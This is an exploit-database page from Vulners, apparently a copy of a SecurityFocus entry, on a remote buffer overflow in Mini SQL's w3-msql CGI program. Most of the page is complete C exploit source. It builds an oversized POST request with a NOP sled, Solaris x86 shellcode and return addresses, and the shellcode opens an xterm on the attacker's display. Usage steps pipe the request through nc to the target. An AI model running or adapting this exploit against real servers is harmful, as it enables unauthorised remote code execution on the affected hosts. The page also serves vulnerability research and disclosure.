Vulners
Lucene search
Hughes Technologies Mini SQL (mSQL) 2.0.11 w3-msql Buffer Overflow
source: http://www.securityfocus.com/bid/898/info
w3-msql is a cgi-program shipped with Mini-SQL which acts as a web interface for msql. There are a number of buffer overflow vulnerabilities in it with one proven to be exploitable. The exploitable buffer is the content-length field and the stack is overflowed inside of a scanf() call. As a result, it is possible to execute arbitrary code remotely as the uid of the webserver (usually nobody).
/*
* !Hispahack Research Team
* http://hispahack.ccc.de
*
* Xploit for /cgi-bin/w3-msql (msql 2.0.4.1 - 2.0.11)
*
* Platform: Solaris x86
* Feel free to port it to other arquitectures, if you can...
* If so mail me plz.
*
* By: Zhodiac <[email protected]>
*
* Steps: 1) gcc -o w3-msql-xploit w3-msql-xploit.c
* 2) xhost +<target_ip>
* 3) ./w3-msql-xploit <target> <display> | nc <target> <http_port>
* 4) Take a cup of cofee, some kind of drug or wathever
* estimulates you at hacking time... while the xterm is comming
* or while you are getting raided.
*
* #include <standard/disclaimer.h>
*
* Madrid, 28/10/99
*
* Spain r0x
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/******************/
/* Customize this */
/******************/
//#define LEN_VAR 50 /* mSQL 2.0.4 - 2.0.10.1 */
#define LEN_VAR 128 /* mSQL 2.0.11 */
// Solaris x86
#define ADDR 0x8045f8
// Shellcode Solaris x86
char shellcode[]= /* By Zhodiac <[email protected]> */
"\x8b\x74\x24\xfc\xb8\x2e\x61\x68\x6d\x05\x01\x01\x01\x01\x39\x06"
"\x74\x03\x46\xeb\xf9\x33\xc0\x89\x46\xea\x88\x46\xef\x89\x46\xfc"
"\x88\x46\x07\x46\x46\x88\x46\x08\x4e\x4e\x88\x46\xff\xb0\x1f\xfe"
"\xc0\x88\x46\x21\x88\x46\x2a\x33\xc0\x89\x76\xf0\x8d\x5e\x08\x89"
"\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x50\x8d\x5e\xf0\x53\x56\x56\xb0"
"\x3b\x9a\xaa\xaa\xaa\xaa\x07\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
"/bin/shA-cA/usr/openwin/bin/xtermA-displayA";
#define ADDR_TIMES 12
#define BUFSIZE LEN_VAR+15*1024+LEN_VAR+ADDR_TIMES*4-16
#define NOP 0x90
int main (int argc, char *argv[]) {
char *buf, *ptr;
long addr=ADDR;
int aux;
if (argc<3){
printf("Usage: %s target display | nc target 80 \n",argv[0]);
exit(-1);
}
if ((buf=malloc(BUFSIZE))==NULL) {
perror("malloc()");
exit(-1);
}
shellcode[44]=(char)strlen(argv[2])+43;
ptr=(char *)buf;
memset(ptr,NOP,BUFSIZE-strlen(argv[2])-strlen(shellcode)-ADDR_TIMES*4);
ptr+=BUFSIZE-strlen(shellcode)-strlen(argv[2])-ADDR_TIMES*4;
memcpy(ptr,shellcode,strlen(shellcode));
ptr+=strlen(shellcode);
memcpy(ptr,argv[2],strlen(argv[2]));
ptr+=strlen(argv[2]);
for (aux=0;aux<ADDR_TIMES;aux++) {
ptr[0] = (addr & 0x000000ff);
ptr[1] = (addr & 0x0000ff00) >> 8;
ptr[2] = (addr & 0x00ff0000) >> 16;
ptr[3] = (addr & 0xff000000) >> 24;
ptr+=4;
}
printf("POST /cgi-bin/w3-msql/index.html HTTP/1.0\n");
printf("Connection: Keep-Alive\n");
printf("User-Agent: Mozilla/4.60 [en] (X11; I; Linux 2.0.38 i686\n");
printf("Host: %s\n",argv[1]);
printf("Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg\n");
printf("Accept-Encoding: gzip\n");
printf("Accept-Language: en\n");
printf("Accept-Charset: iso-8859-1,*,utf-8\n");
printf("Content-type: multipart/form-data\n");
printf("Content-length: %i\n\n",BUFSIZE);
printf("%s \n\n\n",buf);
free(buf);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1